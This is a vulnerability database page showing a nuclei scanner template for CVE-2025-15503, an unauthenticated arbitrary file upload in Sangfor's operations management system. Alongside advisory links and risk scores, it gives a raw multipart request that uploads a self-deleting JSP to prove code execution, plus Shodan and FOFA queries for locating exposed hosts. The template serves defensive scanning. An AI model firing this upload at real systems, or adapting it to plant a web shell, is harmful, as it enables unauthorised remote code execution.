Lucene search
K

Sangfor OSM - Arbitrary File Upload

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Sangfor OSM allows unrestricted file upload via the File parameter, enabling remote code execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-15503
10 Jan 202610:00
circl
CNNVD
Sangfor Operation and Maintenance Management System 代码问题漏洞
10 Jan 202600:00
cnnvd
CVE
CVE-2025-15503
10 Jan 202609:02
cve
Cvelist
CVE-2025-15503 Sangfor Operation and Maintenance Management System common.jsp unrestricted upload
10 Jan 202609:02
cvelist
EUVD
EUVD-2026-1856
10 Jan 202609:02
euvd
NVD
CVE-2025-15503
10 Jan 202609:15
nvd
OSV
CVE-2025-15503
10 Jan 202609:15
osv
Positive Technologies
PT-2026-1780
10 Jan 202600:00
ptsecurity
RedhatCVE
CVE-2025-15503
13 Jan 202622:53
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-15503
10 Mar 202600:00
vulncheck_kev
Rows per page
id: CVE-2025-15503

info:
  name: Sangfor OSM - Arbitrary File Upload
  author: Ark
  severity: critical
  description: |
    Sangfor Operation and Maintenance Management System <= 3.0.8 contains an unrestricted file upload vulnerability caused by manipulation of the \"File\" argument in /fort/trust/version/common/common.jsp, letting remote attackers upload arbitrary files, exploit requires no special privileges.
  impact: |
    Remote attackers can upload arbitrary files, potentially leading to remote code execution or system compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-15503
    - https://github.com/advisories/GHSA-h49h-jpp7-xv85
  classification:
    cve-id: CVE-2025-15503
    epss-score: 0.01907
    epss-percentile: 0.77262
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"/fort/login"
    fofa-query: body="/fort/login" && product="SANGFOR-运维安全管理系统"
  tags: cve,cve2025,sangfor,osm,rce,fileupload,intrusive,vkev

variables:
  randnum: "{{rand_int(100000000, 999999999)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /fort/trust/version/common/common.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

        ------WebKitFormBoundary
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
        Content-Type: image/png

        <%@page import="java.security.MessageDigest,java.math.BigInteger"%><%MessageDigest md=MessageDigest.getInstance("MD5");md.update("{{randnum}}".getBytes());out.print(new BigInteger(1,md.digest()).toString(16));new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        ------WebKitFormBoundary--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Upload success")'
        condition: and
        internal: true

  - raw:
      - |
        GET /fort/trust/version/common/{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, md5(to_string(randnum)))'
        condition: and
# digest: 4b0a0048304602210084ddeb1285a74c37afaffd9aeb6016b6feb7629655bb395deddb7f4d3c36422202210080c4eed2f2e57915388c3485fc728cb87eaaf62c69482695f197441da4a206a9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2026 09:38Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.3 - 9.8
CVSS 46.9
CVSS 27.5
CVSS 37.3
EPSS0.01907
SSVC
13